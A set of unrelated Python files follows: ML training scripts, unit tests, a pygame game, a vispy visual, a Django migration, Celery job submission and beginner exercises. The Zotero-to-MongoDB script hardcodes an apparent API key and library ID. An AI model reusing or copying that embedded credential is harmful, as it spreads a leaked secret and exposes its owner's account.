generator_train_step = generator_solver.minimize(generator_loss , var_list=generator_vars )
"""TRAINING LOOP GOES HERE"""
|
import os
from unittest.mock import patch
from click.testing import CliRunner
from mindmeld import cli
from mindmeld.cli import clean, num_parser
def test_num_parse_already_running(mocker):
runner = CliRunner()
with patch("logging.Logger.info") as mocking:
mocker.patch.object(cli, "_get_duckling_pid", return_value=[123])
runner.invoke(num_parser, ["--start"])
mocking.assert_any_call("Numerical parser running, PID %s", 123)
def test_num_parse_not_running(mocker):
runner = CliRunner()
with patch("logging.Logger.warning") as mocking:
mocker.patch.object(cli, "_get_duckling_pid", return_value=None)
mocker.patch.object(cli, "_find_duckling_os_executable", return_value=None)
runner.invoke(num_parser, ["--start"])
mocking.assert_any_call(
"OS is incompatible with duckling executable. Use docker to install duckling."
)
def test_clean_query_cache(mocker, fake_app):
with patch("logging.Logger.info") as mocking:
runner = CliRunner()
mocker.patch.object(os.path, "exists", return_value=False)
runner.invoke(clean, ["--query-cache"], obj={"app": fake_app})
mocking.assert_any_call("Query cache deleted")
def test_clean_model_cache(mocker, fake_app):
with patch("logging.Logger.warning") as mocking:
runner = CliRunner()
mocker.patch.object(os.path, "exists", return_value=True)
mocker.patch.object(os, "listdir", return_value=["123"])
runner.invoke(clean, ["--model-cache"], obj={"app": fake_app})
mocking.assert_any_call(
"Expected timestamped folder. " "Ignoring the file %s.",
"123/.generated/cached_models/123",
)
|
import sys
import pygame
import random
SCREEN = pygame.display.set_mode((640, 480))
class Missile(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.image = pygame.image.load('images/missile/missile.png').convert_alpha()
self.rect = self.image.get_rect()
x, y = SCREEN.get_size()
self.rect.center = (random.randint(0, x), y)
        # set the delta y value
self.dy = random.randint(5, 15)
def update(self):
self.rect.centery = self.rect.centery - self.dy
if self.rect.top < 0:
self.image = pygame.image.load('images/missile/bang.png').convert_alpha()
self.rect.top = 0
class FireMissile:
def __init__(self):
pygame.init()
pygame.display.set_caption("Fire Missile_미사일 발사 게임")
self.background = pygame.Surface(SCREEN.get_size())
self.background.fill(pygame.Color('black'))
SCREEN.blit(self.background, (0, 0))
self.missile_group = pygame.sprite.Group()
for n in range(3):
self.missile_group.add(Missile())
self.clock = pygame.time.Clock()
def render(self):
self.missile_group.clear(SCREEN, self.background)
        # clear the screen and update > the usual approach
self.missile_group.update()
self.missile_group.draw(SCREEN)
pygame.display.flip()
def fire(self):
fps = 100
        # add 3 missiles
# for num in range(3):
# self.missile_group.add(Missile())
keep_going = True
while keep_going:
self.clock.tick(fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
keep_going = False
# pygame.quit()
# break
for missile in self.missile_group.sprites():
if missile.rect.top == 0:
self.missile_group.remove(missile)
self.missile_group.add(Missile())
self.render()
sys.exit(0)
if __name__ == '__main__':
game = FireMissile()
game.fire()
|
import pymongo
from bson.objectid import ObjectId
from pyzotero import zotero
from getpass import getpass
from sys import argv
if __name__ == '__main__':
#passwd = getpass ("Password: ")
mongo = pymongo.Connection ('localhost', 27017)['refs'] #test
#mongo = pymongo.Connection('localhost', 3002)['meteor']
#mongo.authenticate('skapes', passwd)
library_id= '126319'
library_type='group'
api_key = 'TwxmBGN2hCcTrKePkXPaX9RI'
zot = zotero.Zotero(library_id, library_type, api_key)
items = zot.all_top ()
for item in items:
mongo.references.insert (item)
|
"""
PyTorch implementation of paper "A Neural Algorithm of Artistic Style".
Helper functions.
@author: Zhenye Na
@references:
[1] Leon A. Gatys, Alexander S. Ecker, Matthias Bethge
A Neural Algorithm of Artistic Style. arXiv:1508.06576
"""
import os
import torch
import torch.nn as nn
from PIL import Image
import torchvision.transforms as transforms
# desired size of the output image
imsize = 512 if torch.cuda.is_available() else 128 # use small size if no gpu
loader = transforms.Compose([
transforms.Resize(imsize),
transforms.ToTensor()
])
# reconvert into PIL image
unloader = transforms.ToPILImage()
def image_loader(image_name):
"""Image loader."""
image = Image.open(image_name)
# fake batch dimension required to fit network's input dimensions
image = loader(image).unsqueeze(0)
return image
def save_image(tensor, path):
"""Save a single image."""
image = tensor.cpu().clone()
image = image.squeeze(0)
image = unloader(image)
image.save(os.path.join(path, "out.jpg"))
# create a module to normalize input image so we can easily put it in a
# nn.Sequential
class Normalization(nn.Module):
"""Normalize input image."""
def __init__(self, mean, std):
"""Initialization."""
super(Normalization, self).__init__()
# .view the mean and std to make them [C x 1 x 1] so that they can
# directly work with image Tensor of shape [B x C x H x W].
# B is batch size. C is number of channels. H is height and W is width.
self.mean = torch.tensor(mean).view(-1, 1, 1)
self.std = torch.tensor(std).view(-1, 1, 1)
def forward(self, img):
"""Forward pass."""
return (img - self.mean) / self.std
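# A minimal usage sketch (an assumption, not part of the helpers above): build a
# dummy RGB image, run it through the loader and the Normalization module, and
# write it back out. The mean/std values are the common ImageNet statistics,
# used here only for illustration.
if __name__ == "__main__":
    dummy = Image.new("RGB", (imsize, imsize), color=(128, 64, 32))
    dummy.save("dummy.jpg")
    img = image_loader("dummy.jpg")  # shape [1, 3, imsize, imsize]
    norm = Normalization(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
    print(norm(img).shape)
    save_image(img, ".")  # writes ./out.jpg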
|
##******** 1- QUICK PYTHON EXERCISES FOR DATA SCIENCE / PART 1 ##*********
#1 What is a virtual environment ?
# In short [*] : a virtual environment isolates projects that have different needs.
# Different versions of libraries, packages or modules can be kept side by side,
# and they can work without affecting each other.
# 1.1 FORMAL DEFINITION :
'''The venv module provides support for creating lightweight “virtual environments” with
their own site directories, optionally isolated from system site directories.
Each virtual environment has its own Python binary (which matches the version of the binary that
was used to create this environment) and can have its own independent set of installed Python packages in
its site directories.[1]'''
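# A small illustrative sketch (not part of the exercises): this kind of isolated
# environment can be created programmatically with the standard-library venv module.
# The directory name "my_project_env" is only an example.
import venv
venv.create("my_project_env", with_pip=True)  # creates ./my_project_env with its own interpreter and pip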
#2 What is Conda ?
# In short, it is a tool for creating and managing virtual environments. It also handles dependency management.
# 2.1 FORMAL DEFINITION :
''' Package, dependency and environment management for any language—Python, R, Ruby, Lua, Scala, Java,
JavaScript, C/ C++, FORTRAN, and more.
Conda is an open source package management system and environment management system that runs
on Windows, macOS and Linux.
Conda quickly installs, runs and updates packages and their dependencies.
Conda easily creates, saves, loads and switches between environments on your local computer.
It was created for Python programs, but it can package and distribute software for any language. [2]'''
#3 What is Dependency Management ?
# In short, it is exactly what its name says: managing packages (such as NumPy, Pandas, etc.)
# and the dependencies between them, together with the tools
# that manage those dependencies.
# 3.1 FORMAL DEFINITION :
''' Conda as a package manager helps you find and install packages.
If you need a package that requires a different version of Python, you do not need to switch to
a different environment manager, because conda is also an environment manager.
With just a few commands, you can set up a totally separate environment to run that different version of
Python, while continuing to run your usual version of Python in your normal environment. [3] '''
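# A few typical conda commands illustrating both roles (shell commands, shown here
# as comments since this file is Python; the environment and package names are only examples):
#   conda create --name ds_env python=3.9
#   conda activate ds_env
#   conda install numpy pandas
#   conda env list
#   conda deactivate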
#4 Use string format and print the personnel "no & name"
personnel = {"name": "John", "no": 63323}
"name : {} , no : {}".format(personnel["name"],personnel["no"])
#5 Print the "name" and "no" with fstring.
name = "Connor"
no = 63324
f"Name: {name} , No: {no}"
#6 Please divide the sentence below with the split()
sentence=" Hello Data Science World "
sentence.split()
#7 Please remove the surrounding spaces and the "H" letters from the sentence below by using strip(), in two separate operations.
sentence = " Hello Data Science World "
sentence2 = sentence.strip()  # first operation: strips the surrounding spaces
sentence2.strip("H")          # second operation: strips the leading "H"
#8 Take a number from the user with the input function. Assign the number to the no variable. Multiply it by 8 and
# divide it by 2.
no= int(input())
no*8/2
#9 Create an employee list. Use dir() to see the methods available on it. Use append() to add
# the employee name "Ulas" to the list and then apply the pop() method to remove the element at index 3.
employees = ["John","Connor","Sarah","Arnold"]
dir("John")
employees.append("Ulas")
employees
employees.pop(3)
employees
#10 Create a tuple with 6 elements and print the first 5 of them.
my_tuple=(1,2,"3",4,'5',6)
my_tuple[:5]
#11 WHAT IS ENUMERATE ?
# In short [*] : enumerate automatically generates an index, i.e. a counter, inside a loop.
# Thus, the elements of a list or of any iterable being traversed are indexed automatically.
# This is a life saver for matching, tracking and operating on elements.
# 11.1 FORMAL DEFINITION :
"""In computer programming, an enumerated type
(also called enumeration, enum, or factor in the R programming language,
and a categorical variable in statistics)
is a data type consisting of a set of named values called elements,
members, enumeral, or enumerators of the type.[4]"""
# 11.2 ADDITIONAL DEFINITIONS AND USAGE :
#
#
# The enumerate() method creates a counter that tracks how many iterations have occurred in a loop.
# enumerate() is built-in to Python, so we do not have to import any libraries to use
# the enumerate() method [5]
#
# The enumerate() function takes a collection (e.g. a tuple) and returns it as an enumerate object.
# The enumerate() function adds a counter as the key of the enumerate object.[6]
#12 Write a program with enumerate that gives the output below from the list
employee = ["Ulas", "John", "Connor", "Sarah"]
'''REQUIRED OUTPUT :
0 Ulas
1 John
2 Connor
3 Sarah
'''
for index,name in enumerate(employee):
print(index,name)
#13 Write a program with enumerate that gives the output below from the list.
'''REQUIRED OUTPUT :
1 Ulas
2 John
3 Connor
4 Sarah'''
employee = ["Ulas", "John", "Connor", "Sarah"]
for index, name in enumerate(employee,1):
print(index, name)
#14 Create 2 groups from the employee list. If the index is even assign the name to group X, otherwise to group Y.
# Use enumerate.
X=[]
Y=[]
for index, name in enumerate(employee,1):
if index%2 == 0:
X.append(name)
else:
Y.append(name)
#15 Create a functional solution for question 14
def employeeGroups (employee):
empGroups=[[],[]]
for index, name in enumerate(employee, 1):
if index % 2 == 0:
empGroups[0].append(name)
else:
empGroups[1].append(name)
print(empGroups)
employeeGroups(employee)
#16 Write a modifier function which takes a sentence as an argument. If a character's index is even convert it to lower case,
# otherwise to upper case.
def modifier(string):
modSentence= ""
for i in range(len(string)):
if i%2==0:
modSentence+=string[i].lower()
else:
modSentence+=string[i].upper()
print(modSentence)
modifier("Hello World")
#17 What is Map Function for ?
# In short: map means mapping. It makes it possible to apply
# a given function to each element of an iterable object without writing a loop.
# 17.1 FORMAL DEFINITION :
''' Make an iterator that computes the function using arguments from
each of the iterables. Stops when the shortest iterable is exhausted.[7] '''
# 17.2 ADDITIONAL DEFINITIONS AND USAGE :
#
#
# map(function, iterable, ...)
# Apply function to every item of iterable and return a list of the results.
# If additional iterable arguments are passed, function must take that many arguments
# and is applied to the items from all iterables in parallel.[8]
#18 Please write a new_prices function which increases a price by an additional 30%.
# Then map this function over the list.
prices = [10000, 20000, 30000, 40000, 50000]
def new_prices(p):
return p*30/100 + p
list(map(new_prices,prices))
#19 For question 18, now use a lambda with the map function. Don't write a new_prices function;
# just express its behaviour with a lambda function.
list(map(lambda x: x+x*30/100,prices))
#20 Please filter the even numbers of num_list with a lambda inside the filter() function.
num_list = [0,1,11, 22, 33, 44, 55, 66, 77, 88, 99, 100]
list(filter(lambda x: x%2==0,num_list))
#21 We would like to sum the numbers in num_list with the reduce() function.
# Please write the necessary code.
from functools import reduce
reduce(lambda x,y: x+y,num_list)
# 21.1 : Please explain what the reduce() function does.
# In short, reduce() repeatedly combines the elements of a sequence and reduces them to a single value.
# FORMAL DEFINITION :
"""
def reduce(function, sequence, initial=_initial_missing):
reduce(function, sequence[, initial]) -> value
Apply a function of two arguments cumulatively to the items of a sequence,
from left to right, so as to reduce the sequence to a single value.
For example, reduce(lambda x, y: x+y, [1, 2, 3, 4, 5]) calculates
((((1+2)+3)+4)+5). If initial is present, it is placed before the items
of the sequence in the calculation, and serves as a default when the
sequence is empty. [9]
"""
#22 What is a list comprehension for ?
# In short, it is a concise way of building a new list from a series of operations,
# with the results collected directly into a list.
# FORMAL DEFINITIONS :
'''List comprehension offers a shorter syntax when you want to create a new list based on the values of
an existing list.[10]'''
#List comprehensions provide a concise way to create lists. Common applications are to make new lists
# where each element is the result of some operations applied to each member of another sequence
# or iterable, or to create a subsequence of those elements that satisfy a certain condition. [11]
#23 Please multiply every price in the prices list by 3 and collect the results with a list comprehension.
prices = [10000, 20000, 30000, 40000, 50000]
[i*3 for i in prices ]
#23.1- This time, take only the prices lower than 30000 and multiply them by 3. Use a list comprehension.
[i*3 for i in prices if i<30000 ]
#23.2- This time, if a price is lower than 30000 multiply it by 3, otherwise apply
# new_prices(). Use a list comprehension.
[i * 3 if i < 30000 else new_prices(i) for i in prices ]
#23.3- This time, if a price is lower than 30000 apply new_prices() and multiply the result by 3. Otherwise only apply
# new_prices(). Use a list comprehension.
[3*new_prices(i) if i < 30000 else new_prices(i) for i in prices ]
#24 When should list comprehensions be used ?
# In short, when we want to build a list from an iterable in a simpler, more readable way.
# FORMAL DEFINITIONS :
''' List comprehensions provide us with a simple way to create a list based on some iterable.
# During the creation, elements from the iterable can be conditionally included
in the new list and transformed as needed.[12] '''
#25 There are 2 lists below. Use a list comprehension: loop over the "employee" list and create a new list.
# If a name in "employee" also exists in the "non_employee" list, add it to the new list
# in lower case; add the other names unchanged (capitalized).
employee = ["Ulas", "John", "Connor", "Sarah"]
non_employee = ["John", "Sarah"]
[i.lower() if i in non_employee else i for i in employee]
#26 What is a dictionary comprehension {} and when is it used ?
# In short, it is a construct that builds key/value pairs.
# We use "{}" when we want to keep the results of key and value
# operations as a dictionary.
# FORMAL DEFINITIONS :
''' Returns a dictionary based on existing iterables.[13]'''
#27 What happens when the keys(), values() and items() methods are called on a dictionary ?
dictionary = {'one': 1, 'two': 2, 'three': 3, 'four': 4}
dictionary.values()
dictionary.keys()
dictionary.items()
#28 Use DC (Dictionary Comprehension) to square every value in "dictionary".
{ keys:values**2 for keys,values in dictionary.items() }
#28.1 Use DC (Dictionary Comprehension) to convert every key in "dictionary" to upper case.
{ keys.upper():values for keys,values in dictionary.items() }
#28.2 Repeat each key string twice while keeping the existing values.
{ keys*2:values for keys,values in dictionary.items() }
#29 With a dictionary comprehension, build a dictionary that has the even numbers as keys and their squares as values.
numbers = range(10)
{ keys: keys**2 for keys in numbers if keys%2==0 }
#SOURCES :
#[*]: All statements marked `In short` : https://www.veribilimiokulu.com - Mr Mustafa Vahit Keskin ( Data Scientist ) - DSMLBC4 (2021)
#[1]: https://docs.python.org/3/library/venv.html
#[2]: https://docs.conda.io/en/master/
#[3]: https://docs.conda.io/en/master/
#[4] https://en.wikipedia.org/wiki/Enumerated_type#:~:text=From%20Wikipedia%2C%20the%20free%20encyclopedia,or%20enumerators%20of%20the%20type.
#[5]: https://careerkarma.com/blog/python-enumerate/
#[6]: https://www.w3schools.com/python/ref_func_enumerate.asp
#[7]: https://docs.python.org/3.8/library/functions.html#map & jetbrains help documentation
#[8]: https://stackoverflow.com/questions/10973766/understanding-the-map-function
#[9]: https://docs.python.org/3.8/library/functools.html#functools.reduce
#[10]: https://www.w3schools.com/python/python_lists_comprehension.asp
#[11]: https://docs.python.org/3/tutorial/datastructures.html
#[12]: https://towardsdatascience.com/python-basics-list-comprehensions-631278f22c40
#[13]: https://python-reference.readthedocs.io/en/latest/docs/comprehensions/dict_comprehension.html
|
import os
import sipconfig
#CAS: this is a win32 version, specific to my machine, provided for example.
# The name of the SIP build file generated by SIP and used by the build
# system.
build_file = "blist.sbf"
# Get the SIP configuration information.
config = sipconfig.Configuration()
# Run SIP to generate the code.
os.system(" ".join([config.sip_bin, "-c", ".", "-b", build_file, "sip/blist.sip"]))
# Create the Makefile.
makefile = sipconfig.SIPModuleMakefile(config, build_file)
# Add the library we are wrapping. The name doesn't include any platform
# specific prefixes or extensions (e.g. the "lib" prefix on UNIX, or the
# ".dll" extension on Windows).
makefile.extra_libs = ['buddylist']
makefile.extra_include_dirs.append(r'C:\Users\Christopher\workspace\boost_1_42_0')
makefile.extra_cxxflags.append('//EHsc')
makefile.extra_lib_dirs.extend([r'C:\Users\Christopher\workspace\digsby\ext\src\BuddyList\msvc2008\Release'])
makefile._build['objects'] += " PythonInterface.obj FileUtils.obj"
makefile._build['sources'] += " PythonInterface.cpp FileUtils.cpp"
# Generate the Makefile itself.
makefile.generate()
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Code heavily inspired by:
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
#
# Modified by:
# author: John Bass
# email: john.bobzwik@gmail.com
# license: MIT
# Please feel free to use and modify this, but keep the above information. Thanks!
# -----------------------------------------------------------------------------
import numpy as np
from vispy.geometry import create_box
from vispy.visuals.mesh import MeshVisual
from vispy.visuals.visual import CompoundVisual
from vispy.scene.visuals import create_visual_node
from .varvismesh import VarVisMeshVisual
class BoxMarkersVisual(CompoundVisual):
"""Visual that displays a box.
Parameters
----------
point_coords : array_like
Marker coordinates
width : float
Box width.
height : float
Box height.
depth : float
Box depth.
width_segments : int
Box segments count along the width.
height_segments : float
Box segments count along the height.
depth_segments : float
Box segments count along the depth.
planes: array_like
Any combination of ``{'-x', '+x', '-y', '+y', '-z', '+z'}``
Included planes in the box construction.
vertex_colors : ndarray
Same as for `MeshVisual` class. See `create_plane` for vertex ordering.
face_colors : ndarray
Same as for `MeshVisual` class. See `create_plane` for vertex ordering.
color : Color
The `Color` to use when drawing the cube faces.
edge_color : tuple or Color
The `Color` to use when drawing the cube edges. If `None`, then no
cube edges are drawn.
"""
def __init__(self, point_coords=np.array([0,0,0]), width=1, height=1, depth=1, width_segments=1,
height_segments=1, depth_segments=1, planes=None, vertex_colors=None, face_colors=None,
color=(0.5, 0.5, 1, 1), edge_color=None, variable_vis=False, **kwargs):
self.point_coords = point_coords
self.nb_points = point_coords.shape[0]
self.width = width
self.height = height
self.depth = depth
self.color = color
self._variable_vis = variable_vis
# Create a unit box
width_box = 1
height_box = 1
depth_box = 1
scale = np.array([width, height, depth])
self.vertices_box, self.filled_indices_box, self.outline_indices_box = create_box(
width_box, height_box, depth_box, width_segments, height_segments,
depth_segments, planes)
# Store number of vertices, filled_indices and outline_indices per box
self.nb_v = self.vertices_box.shape[0]
self.nb_fi = self.filled_indices_box.shape[0]
self.nb_oi = self.outline_indices_box.shape[0]
# Create empty arrays for vertices, filled_indices and outline_indices
vertices = np.zeros(self.nb_v*point_coords.shape[0],
[('position', np.float32, 3),
('texcoord', np.float32, 2),
('normal', np.float32, 3),
('color', np.float32, 4)])
filled_indices = np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32)
outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32)
if self.variable_vis:
# "box_to_face" and "box_to_outl" represent array of faces and
# outlines indexes associated to each box
box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32)
box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32)
# Iterate for every marker
for i in range(self.nb_points):
idx_v_start = self.nb_v*i
idx_v_end = self.nb_v*(i+1)
idx_fi_start = self.nb_fi*i
idx_fi_end = self.nb_fi*(i+1)
idx_oi_start = self.nb_oi*i
idx_oi_end = self.nb_oi*(i+1)
# Scale and translate unit box
vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i]
filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start
outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start
if self.variable_vis:
box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end)
box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end)
if self.variable_vis:
self.box_to_face = box_to_face
self.box_to_outl = box_to_outl
self._visible_boxes = np.arange(self.nb_points)
# Create MeshVisual for faces and borders
self._mesh = VarVisMeshVisual(self.nb_points, vertices['position'], filled_indices,
vertex_colors, face_colors, color, variable_vis=variable_vis)
if edge_color:
self._border = VarVisMeshVisual(self.nb_points, vertices['position'], outline_indices,
color=edge_color, mode='lines', variable_vis=variable_vis)
else:
self._border = VarVisMeshVisual(self.nb_points)
CompoundVisual.__init__(self, [self._mesh, self._border], **kwargs)
self.mesh.set_gl_state(polygon_offset_fill=True,
polygon_offset=(1, 1), depth_test=True)
self.freeze()
def set_visible_boxes(self, idx_box_vis):
"""Set which boxes are visible.
Parameters
----------
idx_box_vis : Array like
Index array of ALL visible boxes of point_coords
"""
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis"')
# Find which boxes are now visible that weren't last update of 'self.visible_boxes',
# and vice-versa
newbox_vis = np.setdiff1d(idx_box_vis, self.visible_boxes)
oldbox_vis = np.setdiff1d(self.visible_boxes, idx_box_vis)
# Get the new visible vertices indexes for the faces (mesh) and outlines (border)
# and the new invisible vertices indexes
idx_face_vis = np.ravel(self.box_to_face[newbox_vis])
idx_outl_vis = np.ravel(self.box_to_outl[newbox_vis])
idx_face_invis = np.ravel(self.box_to_face[oldbox_vis])
idx_outl_invis = np.ravel(self.box_to_outl[oldbox_vis])
# Update mesh visibility bool array
self.mesh.set_visible_faces(idx_face_vis)
self.mesh.set_invisible_faces(idx_face_invis)
self.mesh.update_vis_buffer()
# Update border visibility bool array
self.border.set_visible_faces(idx_outl_vis)
self.border.set_invisible_faces(idx_outl_invis)
self.border.update_vis_buffer()
# Update 'self.visible_boxes'
self.visible_boxes = idx_box_vis
def set_data(self, point_coords=None, width=None, height=None, depth=None, vertex_colors=None, face_colors=None, color=None, edge_color=None):
if point_coords is None:
point_coords = self.point_coords
else:
self.point_coords = point_coords
if width is None:
width = self.width
else:
self.width = width
if height is None:
height = self.height
else:
self.height = height
if depth is None:
depth = self.depth
else:
self.depth = depth
if color is None:
color = self.color
else:
self.color = color
self.nb_points = point_coords.shape[0]
# Create empty arrays for vertices, filled_indices and outline_indices
vertices = np.zeros(self.nb_v*point_coords.shape[0],
[('position', np.float32, 3),
('texcoord', np.float32, 2),
('normal', np.float32, 3),
('color', np.float32, 4)])
filled_indices = np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32)
outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32)
if self.variable_vis:
# "box_to_face" and "box_to_outl" represent array of faces and
# outlines indexes associated to each box
box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32)
box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32)
scale = np.array([width, height, depth])
# Iterate for every marker
for i in range(point_coords.shape[0]):
idx_v_start = self.nb_v*i
idx_v_end = self.nb_v*(i+1)
idx_fi_start = self.nb_fi*i
idx_fi_end = self.nb_fi*(i+1)
idx_oi_start = self.nb_oi*i
idx_oi_end = self.nb_oi*(i+1)
# Scale and translate unit box
vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i]
filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start
outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start
if self.variable_vis:
box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end)
box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end)
if self.variable_vis:
self.box_to_face = box_to_face
self.box_to_outl = box_to_outl
self._visible_boxes = np.arange(self.nb_points)
# Create MeshVisual for faces and borders
self.mesh.set_data(vertices['position'], filled_indices, vertex_colors, face_colors, color)
self.border.set_data(vertices['position'], outline_indices, color=edge_color)
@property
def variable_vis(self):
"""Bool if instance of BoxMarkersVisual posseses variable visibility.
"""
return self._variable_vis
@variable_vis.setter
def variable_vis(self, variable_vis):
raise ValueError('Not allowed to change "variable_vis" after initialization.')
@property
def visible_boxes(self):
"""Array of indexes of boxes that are currently visible.
"""
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis".')
return self._visible_boxes
@visible_boxes.setter
def visible_boxes(self, visible_boxes):
if not self.variable_vis:
raise ValueError('Variable visibility must be enabled via "variable_vis".')
self._visible_boxes = visible_boxes
@property
def mesh(self):
"""The vispy.visuals.MeshVisual that used to fill in.
"""
return self._mesh
@mesh.setter
def mesh(self, mesh):
self._mesh = mesh
@property
def border(self):
"""The vispy.visuals.MeshVisual that used to draw the border.
"""
return self._border
@border.setter
def border(self, border):
self._border = border
BoxMarkers = create_visual_node(BoxMarkersVisual)
|
# Generated by Django 3.0 on 2021-03-07 20:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lms_app', '0004_auto_20210228_2000'),
]
operations = [
migrations.AddField(
model_name='video',
name='vimeo_video',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
|
#!/usr/bin/python
import Queue
import subprocess
import os
import datetime
import argparse
import shutil
import multiprocessing
from celery import Celery
from gridmaster import submit
from gridmaster import getwork
from gridmaster import donework
def main():
parser = argparse.ArgumentParser()
parser.add_argument("filename", help='file containing newline-separated jobs', type = str)
args = parser.parse_args()
with open(args.filename, 'r') as fh:
        for line in fh:
            job_command = line.strip()
            # skip blank lines and comment lines; submit everything else
            if job_command and not job_command.startswith('#'):
                submit.delay(job_command)
if __name__ == "__main__":
main()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from sklearn import base, cross_validation
from sklearn.externals import joblib
from .sofia_ml import svm_train, learner_type, loop_type, eta_type
class RankSVM(base.BaseEstimator):
""" RankSVM model using stochastic gradient descent.
TODO: does this fit intercept ?
Parameters
----------
alpha : float
model : str, default='rank'
max_iter : int, default=1000
Number of stochastic gradient steps to take
"""
def __init__(self, alpha=1., model='rank', max_iter=1000):
self.alpha = alpha
self.max_iter = max_iter
self.model = model
def fit(self, X, y, query_id=None):
n_samples, n_features = X.shape
self.coef_ = svm_train(X, y, query_id, self.alpha, n_samples,
n_features, learner_type.sgd_svm,
loop_type.rank, eta_type.basic_eta,
max_iter=self.max_iter)
return self
def rank(self, X):
order = np.argsort(X.dot(self.coef_))
order_inv = np.zeros_like(order)
order_inv[order] = np.arange(len(order))
return order_inv
# just so that GridSearchCV doesn't complain
predict = rank
def score(self, X, y):
tau, _ = stats.kendalltau(X.dot(self.coef_), y)
return np.abs(tau)
def _inner_fit(X, y, query_id, train, test, alpha):
# aux method for joblib
clf = RankSVM(alpha=alpha)
if query_id is None:
clf.fit(X[train], y[train])
else:
clf.fit(X[train], y[train], query_id[train])
return clf.score(X[test], y[test])
class RankSVMCV(base.BaseEstimator):
"""
Cross-validated RankSVM
the cross-validation generator will be ShuffleSplit
"""
def __init__(self, alphas=np.logspace(-1, 4, 5), cv=5,
n_jobs=1, model='rank', max_iter=1000):
self.alphas = alphas
self.max_iter = max_iter
self.model = model
self.cv = cv
self.n_jobs = n_jobs
def fit(self, X, y, query_id=None):
if hasattr(self.cv, '__iter__'):
cv = self.cv
else:
cv = cross_validation.ShuffleSplit(len(y), n_iter=self.cv)
mean_scores = []
if query_id is not None:
query_id = np.array(query_id)
if not len(query_id) == len(y):
raise ValueError('query_id of wrong shape')
for a in self.alphas:
scores = joblib.Parallel(n_jobs=self.n_jobs)(
joblib.delayed(_inner_fit)
(X, y, query_id, train, test, a) for train, test in cv)
mean_scores.append(np.mean(scores))
self.best_alpha_ = self.alphas[np.argmax(mean_scores)]
self.estimator_ = RankSVM(self.best_alpha_)
self.estimator_.fit(X, y, query_id)
self.rank = self.estimator_.rank
def score(self, X, y):
return self.estimator_.score(X, y)
def predict(self, X):
return self.estimator_.predict(X)
|
# Importing the Libraries
import tensorflow as tf
import nni
# loading the MNIST dataset & performing the Normalization
def load_dataset():
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
return (x_train/255., y_train), (x_test/255., y_test)
# Creating the Sequential Model
def create_model(num_units, dropout_rate, lr, activation):
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(num_units, activation=activation),
tf.keras.layers.Dropout(dropout_rate),
tf.keras.layers.Dense(10, activation="softmax")
])
model.compile(
loss="sparse_categorical_crossentropy",
optimizer=tf.keras.optimizers.Adam(lr=lr),
metrics=["accuracy"]
)
return model
# Defining the callbacks
class ReportIntermediates(tf.keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
acc = logs.get("val_accuracy") or 0.
nni.report_intermediate_result(acc)
def main(params):
num_units = params.get("num_units")
dropout_rate = params.get("dropout_rate")
lr = params.get("lr")
batch_size = params.get("batch_size")
activation = params.get("activation")
model = create_model(num_units, dropout_rate, lr, activation)
(x_train, y_train), (x_test, y_test) = load_dataset()
_ = model.fit(
x_train, y_train,
validation_data=(x_test, y_test),
epochs=10,
verbose=False,
batch_size=batch_size,
callbacks=[ReportIntermediates()]
)
_, acc = model.evaluate(x_test, y_test, verbose=False)
nni.report_final_result(acc)
if __name__ == "__main__":
params = {
"num_units": 32,
"dropout_rate": 0.1,
"lr": 0.0001,
"batch_size": 32,
"activation": "relu"
}
tuned_params = nni.get_next_parameter()
params.update(tuned_params)
main(params)
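# A possible search space for the parameters tuned above (an illustrative sketch;
# in practice this lives in a separate search_space.json referenced from the NNI
# experiment config, and the ranges below are only examples):
# {
#     "num_units": {"_type": "choice", "_value": [32, 64, 128, 256]},
#     "dropout_rate": {"_type": "uniform", "_value": [0.1, 0.5]},
#     "lr": {"_type": "loguniform", "_value": [0.0001, 0.1]},
#     "batch_size": {"_type": "choice", "_value": [32, 64, 128]},
#     "activation": {"_type": "choice", "_value": ["relu", "tanh", "sigmoid"]}
# }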
|
""" test get/set & misc """
import pandas as pd
from pandas import MultiIndex, Series
def test_access_none_value_in_multiindex():
# GH34318: test that you can access a None value using .loc through a Multiindex
s = Series([None], pd.MultiIndex.from_arrays([["Level1"], ["Level2"]]))
result = s.loc[("Level1", "Level2")]
assert result is None
midx = MultiIndex.from_product([["Level1"], ["Level2_a", "Level2_b"]])
s = Series([None] * len(midx), dtype=object, index=midx)
result = s.loc[("Level1", "Level2_a")]
assert result is None
s = Series([1] * len(midx), dtype=object, index=midx)
result = s.loc[("Level1", "Level2_a")]
assert result == 1
|
import base64
import gzip
from starlette.requests import Request
from starlette.responses import JSONResponse, Response
from yarl import URL
